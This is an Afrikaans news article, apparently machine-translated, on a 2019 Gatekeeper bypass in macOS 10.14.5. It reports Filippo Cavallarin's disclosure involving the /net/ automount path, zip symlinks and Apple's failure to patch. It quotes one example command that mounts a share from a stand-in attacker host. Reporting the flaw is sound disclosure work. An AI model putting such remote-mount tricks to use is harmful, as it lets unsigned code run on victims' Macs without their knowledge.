Dit is maklik om 'n kwaadwillige toepassing op 'n Mac te installeer. Apple het selfs ná drie maande nie die fout reggemaak nie

27. 5. 2019

Sekuriteitsnavorser Filippo Cavallarin het 'n waarskuwing oor die fout in macOS 10.14.5 op sy blog geplaas. Dit bestaan uit die moontlikheid om Gatekeeper se sekuriteitsmaatreëls heeltemal te omseil. Volgens Cavallarin het hy reeds in Februarie vanjaar die fout aan Apple uitgewys, maar die maatskappy het dit nie in die jongste opdatering reggemaak nie.

Gatekeeper is deur Apple ontwikkel en vir die eerste keer in 2012 by sy rekenaarbedryfstelsel geïnkorporeer. Dit is 'n meganisme wat verhoed dat 'n toepassing sonder die gebruiker se medewete en toestemming loop. Nadat jy 'n toepassing afgelaai het, gaan Gatekeeper outomaties sy kode na om te sien of die sagteware behoorlik deur Apple onderteken is.

In sy blogpos merk Cavallarin op dat Gatekeeper by verstek beide eksterne berging en netwerkaandele as veilige liggings beskou. Enige toepassing wat in hierdie teikens woon, kan dus outomaties geloods word sonder om deur die Hekwagter-tjek te gaan. Dit is hierdie kenmerk wat uitgebuit kan word om kwaadwillige sagteware te begin sonder die gebruiker se medewete.

Een aspek wat ongemagtigde toegang toelaat, is die outomonteer-funksie, wat gebruikers toelaat om outomaties 'n netwerkaandeel te koppel deur bloot 'n pad te spesifiseer wat begin met "/net/". As 'n voorbeeld noem Cavallarin die pad "ls /net/evil-attacker.com/sharedfolder/" wat kan veroorsaak dat die bedryfstelsel die inhoud van 'n "sharefolder"-lêergids in 'n afgeleë ligging laai wat potensieel kwaadwillig kan wees.

Jy kan in die video kyk hoe die bedreiging werk:

Nog 'n faktor is die feit dat as 'n zip-argief wat 'n spesifieke simlink wat lei tot die outomount-funksie bevat, gedeel word, dit nie deur Gatekeeper nagegaan sal word nie. Op hierdie manier kan die slagoffer maklik die kwaadwillige argief aflaai en dit uitpak, sodat die aanvaller feitlik enige sagteware op die Mac kan laat loop sonder die gebruiker se medewete. Die Finder, wat sekere uitbreidings by verstek versteek, het ook sy deel van hierdie kwesbaarheid.

Cavallarin verklaar op sy blog dat Apple op 22 Februarie vanjaar die aandag gevestig het op die kwesbaarheid van die macOS-bedryfstelsel. Maar in die middel van Mei het Apple opgehou om met Cavallarin te kommunikeer, so Cavallarin het besluit om die hele ding openbaar te maak.

bron: FCVL

Onderwerpe: berging, outomaties, MacOS, video, Instellings, funksie, gebruiker, Toepassing, appel

Bespreking van die artikel

Jou naam

Jou kommentaar

Deur bogenoemde data in te vul, erken ek dat die maatskappy TEXT FACTORY s.r.o., geregistreerde kantoor in Brno, Durďákova 336/29, Černá Pole, Poskode: 613 00, ID-nommer: 06157831, geregistreer by die streekhof C in Brno , voeg 100399 in, sal my persoonlike data verwerk wat verskaf word in die registrasievorm wat deur my ingevul is op grond van die wettige belange van TEXT FACTORY s.r.o. volgens Artikel 6 paragraaf 1 brief f) GDPR en om wetlike verpligtinge na te kom (Artikel 6, paragraaf 1, letter c) GDPR), vir die volgende doeleindes: die noodsaaklikheid om die magtiging van besoekers aan webwerwe wat deur TEXT FACTORY s.r.o. bedryf word te verseker om aktief by te dra tot gepubliseerde artikels of binne bespreking forums en die uitoefening van die regte van TEXT FACTORY s.r.o. as die administrateur van hierdie besprekingsforums. Meer inligting oor die verwerking van persoonlike data en regte kan gevind word in Lesse oor persoonlike databeskerming. die hele teks

Dit kan wees jou interesseer

Verwante